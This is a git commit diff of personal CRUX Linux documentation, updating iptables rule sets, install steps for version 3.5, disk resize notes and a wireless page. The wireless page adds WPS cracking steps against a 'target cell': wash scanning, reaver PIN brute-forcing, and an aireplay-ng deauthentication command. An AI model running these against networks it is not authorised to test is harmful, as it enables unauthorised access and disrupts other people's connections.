diff options
| author | Silvino Silva <silvino@bk.ru> | 2019-11-09 00:50:32 +0000 |
|---|---|---|
| committer | Silvino Silva <silvino@bk.ru> | 2019-11-09 00:50:32 +0000 |
| commit | a230f4682823c1032413cd4974f4f3a4a1d6d389 (patch) | |
| tree | 03dea1a7151a6e2b6858979c1f080676725f3b48 | |
| parent | 0ea1c51d7926b906818283fd6fd899f11f1d56bb (diff) | |
| download | doc-a230f4682823c1032413cd4974f4f3a4a1d6d389.tar.gz | |
initial update to crux 3.5
| -rw-r--r-- | core/conf/iptables/bridge.v4 | 33 | ||||
| -rw-r--r-- | core/conf/iptables/server.v4 | 60 | ||||
| -rw-r--r-- | core/install.html | 18 | ||||
| -rw-r--r-- | index.html | 2 | ||||
| -rw-r--r-- | tools/qemu.html | 4 | ||||
| -rw-r--r-- | tools/storage.html | 2 | ||||
| -rw-r--r-- | tools/wireless.html | 38 |
7 files changed, 93 insertions, 64 deletions
diff --git a/core/conf/iptables/bridge.v4 b/core/conf/iptables/bridge.v4 index 4930262..bea9be0 100644 --- a/core/conf/iptables/bridge.v4 +++ b/core/conf/iptables/bridge.v4 @@ -1,34 +1,34 @@ -# Generated by iptables-save v1.8.2 on Fri Jun 28 01:22:10 2019 +# Generated by iptables-save v1.8.2 on Sun Jul 7 23:48:36 2019 *security :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] COMMIT -# Completed on Fri Jun 28 01:22:10 2019 -# Generated by iptables-save v1.8.2 on Fri Jun 28 01:22:10 2019 +# Completed on Sun Jul 7 23:48:36 2019 +# Generated by iptables-save v1.8.2 on Sun Jul 7 23:48:36 2019 *raw -:PREROUTING ACCEPT [2:80] -:OUTPUT ACCEPT [3:4544] +:PREROUTING ACCEPT [0:0] +:OUTPUT ACCEPT [1:2468] COMMIT -# Completed on Fri Jun 28 01:22:10 2019 -# Generated by iptables-save v1.8.2 on Fri Jun 28 01:22:10 2019 +# Completed on Sun Jul 7 23:48:36 2019 +# Generated by iptables-save v1.8.2 on Sun Jul 7 23:48:36 2019 *nat :PREROUTING ACCEPT [0:0] :INPUT ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :POSTROUTING ACCEPT [0:0] COMMIT -# Completed on Fri Jun 28 01:22:10 2019 -# Generated by iptables-save v1.8.2 on Fri Jun 28 01:22:10 2019 +# Completed on Sun Jul 7 23:48:36 2019 +# Generated by iptables-save v1.8.2 on Sun Jul 7 23:48:36 2019 *mangle -:PREROUTING ACCEPT [2:80] -:INPUT ACCEPT [2:80] +:PREROUTING ACCEPT [0:0] +:INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] -:OUTPUT ACCEPT [3:4544] -:POSTROUTING ACCEPT [2:2292] +:OUTPUT ACCEPT [1:2468] +:POSTROUTING ACCEPT [0:0] COMMIT -# Completed on Fri Jun 28 01:22:10 2019 -# Generated by iptables-save v1.8.2 on Fri Jun 28 01:22:10 2019 +# Completed on Sun Jul 7 23:48:36 2019 +# Generated by iptables-save v1.8.2 on Sun Jul 7 23:48:36 2019 *filter :INPUT DROP [0:0] :FORWARD DROP [0:0] @@ -92,6 +92,7 @@ COMMIT -A FORWARD -d 10.0.0.4/32 -i br0 -o br0 -m physdev --physdev-in enp8s0 -j srv_git_in -A FORWARD -i br0 -o br0 -p tcp -m physdev --physdev-in enp8s0 -m tcp --sport 443 --dport 1024:65535 -j ACCEPT -A FORWARD -d 10.0.0.3/32 -i br0 -o br0 -m physdev --physdev-in enp8s0 -j cli_http_in +-A FORWARD -d 10.0.0.4/32 -i br0 -o br0 -m physdev --physdev-in enp8s0 -j cli_http_in -A FORWARD -i br0 -o br0 -p udp -m udp --sport 520 --dport 519 -j DROP -A FORWARD -i br0 -o br0 -p udp -m udp --sport 520 --dport 520 -j DROP -A FORWARD -j LOG --log-prefix "iptables: FORWARD: " --log-level 7 @@ -220,4 +221,4 @@ COMMIT -A srv_ssh_out -p tcp -m tcp --sport 22 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT -A srv_ssh_out -j RETURN COMMIT -# Completed on Fri Jun 28 01:22:10 2019 +# Completed on Sun Jul 7 23:48:36 2019 diff --git a/core/conf/iptables/server.v4 b/core/conf/iptables/server.v4 index ed202ee..678800b 100644 --- a/core/conf/iptables/server.v4 +++ b/core/conf/iptables/server.v4 @@ -1,34 +1,34 @@ -# Generated by iptables-save v1.8.2 on Sat Jun 8 19:50:25 2019 +# Generated by iptables-save v1.8.3 on Mon Jul 8 00:42:39 2019 *security :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [0:0] COMMIT -# Completed on Sat Jun 8 19:50:25 2019 -# Generated by iptables-save v1.8.2 on Sat Jun 8 19:50:25 2019 +# Completed on Mon Jul 8 00:42:39 2019 +# Generated by iptables-save v1.8.3 on Mon Jul 8 00:42:39 2019 *raw :PREROUTING ACCEPT [0:0] -:OUTPUT ACCEPT [0:0] +:OUTPUT ACCEPT [1:132] COMMIT -# Completed on Sat Jun 8 19:50:25 2019 -# Generated by iptables-save v1.8.2 on Sat Jun 8 19:50:25 2019 +# Completed on Mon Jul 8 00:42:39 2019 +# Generated by iptables-save v1.8.3 on Mon Jul 8 00:42:39 2019 *nat :PREROUTING ACCEPT [0:0] :INPUT ACCEPT [0:0] :OUTPUT ACCEPT [0:0] :POSTROUTING ACCEPT [0:0] COMMIT -# Completed on Sat Jun 8 19:50:25 2019 -# Generated by iptables-save v1.8.2 on Sat Jun 8 19:50:25 2019 +# Completed on Mon Jul 8 00:42:39 2019 +# Generated by iptables-save v1.8.3 on Mon Jul 8 00:42:39 2019 *mangle :PREROUTING ACCEPT [0:0] :INPUT ACCEPT [0:0] :FORWARD ACCEPT [0:0] -:OUTPUT ACCEPT [0:0] +:OUTPUT ACCEPT [1:132] :POSTROUTING ACCEPT [0:0] COMMIT -# Completed on Sat Jun 8 19:50:25 2019 -# Generated by iptables-save v1.8.2 on Sat Jun 8 19:50:25 2019 +# Completed on Mon Jul 8 00:42:39 2019 +# Generated by iptables-save v1.8.3 on Mon Jul 8 00:42:39 2019 *filter :INPUT DROP [0:0] :FORWARD DROP [0:0] @@ -71,26 +71,30 @@ COMMIT :srv_ssh_out - [0:0] -A INPUT -s 127.0.0.0/8 -d 127.0.0.0/8 -i lo -j ACCEPT -A INPUT -j blocker --A INPUT -s 212.55.154.174/32 -d 10.0.0.254/32 -i enp8s0 -j cli_dns_in --A INPUT -s 10.0.0.0/8 -d 10.0.0.254/32 -i enp8s0 -j srv_https_in --A INPUT -s 10.0.0.0/8 -d 10.0.0.254/32 -i enp8s0 -j srv_ssh_in --A INPUT -s 10.0.0.0/8 -d 10.0.0.254/32 -i enp8s0 -j srv_git_in --A INPUT -d 10.0.0.254/32 -i enp8s0 -j srv_https_in --A INPUT -d 10.0.0.254/32 -i enp8s0 -j cli_https_in --A INPUT -d 10.0.0.254/32 -i enp8s0 -j srv_ssh_in --A INPUT -d 10.0.0.254/32 -i enp8s0 -j srv_git_in +-A INPUT -s 10.0.0.254/32 -d 10.0.0.4/32 -i ens3 -j cli_dns_in +-A INPUT -s 10.0.0.0/8 -d 10.0.0.4/32 -i ens3 -j srv_https_in +-A INPUT -s 10.0.0.0/8 -d 10.0.0.4/32 -i ens3 -j srv_ssh_in +-A INPUT -s 10.0.0.0/8 -d 10.0.0.4/32 -i ens3 -j srv_git_in +-A INPUT -s 10.0.0.0/8 -d 10.0.0.4/32 -i ens3 -j cli_http_in +-A INPUT -d 10.0.0.4/32 -i ens3 -j srv_https_in +-A INPUT -d 10.0.0.4/32 -i ens3 -j cli_https_in +-A INPUT -d 10.0.0.4/32 -i ens3 -j cli_http_in +-A INPUT -d 10.0.0.4/32 -i ens3 -j srv_ssh_in +-A INPUT -d 10.0.0.4/32 -i ens3 -j srv_git_in -A INPUT -j LOG --log-prefix "iptables: INPUT: " --log-level 7 -A FORWARD -j LOG --log-prefix "iptables: FORWARD: " --log-level 7 -A OUTPUT -s 127.0.0.0/8 -d 127.0.0.0/8 -o lo -j ACCEPT -A OUTPUT -j blocker --A OUTPUT -s 10.0.0.254/32 -d 212.55.154.174/32 -o enp8s0 -j cli_dns_out --A OUTPUT -s 10.0.0.254/32 -d 10.0.0.0/8 -o enp8s0 -j srv_https_out --A OUTPUT -s 10.0.0.254/32 -d 10.0.0.0/8 -o enp8s0 -j srv_ssh_out --A OUTPUT -s 10.0.0.254/32 -d 10.0.0.0/8 -o enp8s0 -j srv_git_out --A OUTPUT -s 10.0.0.254/32 -o enp8s0 -j cli_https_out --A OUTPUT -s 10.0.0.254/32 -o enp8s0 -j srv_https_out --A OUTPUT -d 10.0.0.0/8 -o enp8s0 -j srv_ssh_out --A OUTPUT -d 10.0.0.0/8 -o enp8s0 -j srv_git_out +-A OUTPUT -s 10.0.0.4/32 -d 10.0.0.254/32 -o ens3 -j cli_dns_out +-A OUTPUT -s 10.0.0.4/32 -d 10.0.0.0/8 -o ens3 -j cli_http_out +-A OUTPUT -s 10.0.0.4/32 -d 10.0.0.0/8 -o ens3 -j srv_https_out +-A OUTPUT -s 10.0.0.4/32 -d 10.0.0.0/8 -o ens3 -j srv_ssh_out +-A OUTPUT -s 10.0.0.4/32 -d 10.0.0.0/8 -o ens3 -j srv_git_out +-A OUTPUT -s 10.0.0.4/32 -o ens3 -j cli_https_out +-A OUTPUT -s 10.0.0.4/32 -o ens3 -j cli_http_out +-A OUTPUT -s 10.0.0.4/32 -o ens3 -j srv_https_out +-A OUTPUT -d 10.0.0.0/8 -o ens3 -j srv_ssh_out +-A OUTPUT -d 10.0.0.0/8 -o ens3 -j srv_git_out -A OUTPUT -j LOG --log-prefix "iptables: OUTPUT: " --log-level 7 -A blocker -p tcp -m tcp ! --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -m limit --limit 5/min --limit-burst 7 -j LOG --log-prefix "iptables: drop sync: " --log-level 7 -A blocker -p tcp -m tcp ! --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j DROP @@ -201,4 +205,4 @@ COMMIT -A srv_ssh_out -p tcp -m tcp --sport 22 --dport 1024:65535 -m state --state ESTABLISHED -j ACCEPT -A srv_ssh_out -j RETURN COMMIT -# Completed on Sat Jun 8 19:50:25 2019 +# Completed on Mon Jul 8 00:42:39 2019 diff --git a/core/install.html b/core/install.html index 1526c12..6ee381b 100644 --- a/core/install.html +++ b/core/install.html @@ -2,20 +2,20 @@ <html dir="ltr" lang="en"> <head> <meta charset='utf-8'> - <title>1.1. Install Crux 3.4</title> + <title>1.1. Install Crux 3.5</title> </head> <body> <a href="index.html">Core OS Index</a> - <h1>1.1. Install Crux 3.4</h1> + <h1>1.1. Install Crux 3.5</h1> - <p>Installation of minimal Crux 3.4 Gnu\Linux system, + <p>Installation of minimal Crux 3.5 Gnu\Linux system, with selected packages from core, opt and contrib ports. Process of installation documented can be executed from iso or from existing gnu\linux installation. Read - <a href="http://crux.nu/Main/Handbook3-4">Hand book 3.4</a>, + <a href="http://crux.nu/Main/Handbook3-5">Hand book 3.4</a>, .</p> <p>If you are booting from crux iso and is not your keyboard @@ -34,10 +34,10 @@ iso from master repo and checks md5sum.</p> <pre> - $ curl -k -O https://serverop.de/crux/crux-3.4/iso/crux-3.4.iso - $ curl -k -O https://serverop.de/crux/crux-3.4/iso/crux-3.4.md5 - $ md5sum crux-3.4.iso - 73bf4d301e2dcfb0636cb7fc2a9e8fde crux-3.4.iso + $ curl -k -O https://serverop.de/crux/crux-3.5/iso/crux-3.5.iso + $ curl -k -O https://serverop.de/crux/crux-3.5/iso/crux-3.5.md5 + $ md5sum crux-3.5.iso + 73bf4d301e2dcfb0636cb7fc2a9e8fde crux-3.5.iso </pre> <h2 id="step2">1.1.2. Prepare target</h2> @@ -240,7 +240,7 @@ <pre> # modprobe isofs # modprobe loop - # mount -o loop crux-3.4.iso $CHROOT/media + # mount -o loop crux-3.5.iso $CHROOT/media </pre> <h2 id="step4">1.1.4. Install Crux</h2> diff --git a/index.html b/index.html index 8a25df0..ae576c8 100644 --- a/index.html +++ b/index.html @@ -28,7 +28,7 @@ # NAME=ports URL=git://hive.gnu.systems/ports.git - BRANCH=stable-3.4 + BRANCH=stable-3.5 destination=/usr/ports/ports PORTS_DIR="/usr/ports" </pre> diff --git a/tools/qemu.html b/tools/qemu.html index d6c1738..262781e 100644 --- a/tools/qemu.html +++ b/tools/qemu.html @@ -176,13 +176,13 @@ the current setting? Fix/Ignore? Fix - (parted) resize 3 100% + (parted) resizepart 3 100% (parted) quit </pre> <pre> - # resize2fs /dev/mapper/nbd0p3 # e2fsck /dev/mapper/nbd0p3 + # resize2fs /dev/mapper/nbd0p3 </pre> <h2 id="net">3. Network</h2> diff --git a/tools/storage.html b/tools/storage.html index 3a0a064..5f7e5e3 100644 --- a/tools/storage.html +++ b/tools/storage.html @@ -143,8 +143,8 @@ images read <a href="qemu.html#resize">resize images</a></p> <pre> - # resize2fs /dev/sda3 # e2fsck /dev/sda3 + # resize2fs /dev/sda3 </pre> <a href="index.html">Tools Index</a> diff --git a/tools/wireless.html b/tools/wireless.html index f4eeddb..afb12b3 100644 --- a/tools/wireless.html +++ b/tools/wireless.html @@ -13,11 +13,7 @@ # iwconfig wlp2s0 essid name_of_network </pre> - <h4>Recover Password WPS</h4> - - <p>Tested on debian system only.</p> - - <p>First get mac address of the target cell;</p> + <p>To get mac address of the target cell;</p> <pre> # iwlist wlp2s0 scan @@ -29,6 +25,11 @@ Cell 03 - Address: A8:A6:68:98:0C:C5 </pre> + + <h4>Recover Password WPS</h4> + + <p>First check processes that interfere with state of the interface and kill them;</p> + <pre> # airmon-ng check @@ -57,7 +58,7 @@ # kill -9 1271 </pre> - <p>Just to be sure that everything is as it should;</p> + <p>If wireless card is intel;</p> <pre> # rmmod iwlmvm @@ -82,6 +83,18 @@ (monitor mode enabled on mon0) </pre> + <p>Airdump-ng don't report if a router have WPS or not, for that is used wash;</p> + + <pre> + # wash -i wlp2s0 + </pre> + + <p>If the program report "Found packet with bad FCS", run with -C;</p> + + <pre> + # wash -C -i wlp2s0 + </pre> + <p>Put mon0 on same channel of target cell;</p> <pre> @@ -91,8 +104,19 @@ <p>Start the magic;</p> <pre> - # reaver -i mon0 -b A8:A6:68:98:0C:C5 -vv + # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -vv </pre> + <p>If BSSID is cloaked, not being broadcasted, provide it to reaver;</p> + + <pre> + # reaver -i mon0 -b A8:A6:68:98:0C:C5 -c 6 -e "bssid_name" -vv + </pre> + + <p>-a address of access point, -c client to deauthenticate</p> + + <pre> + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 + </pre> </body> </html> |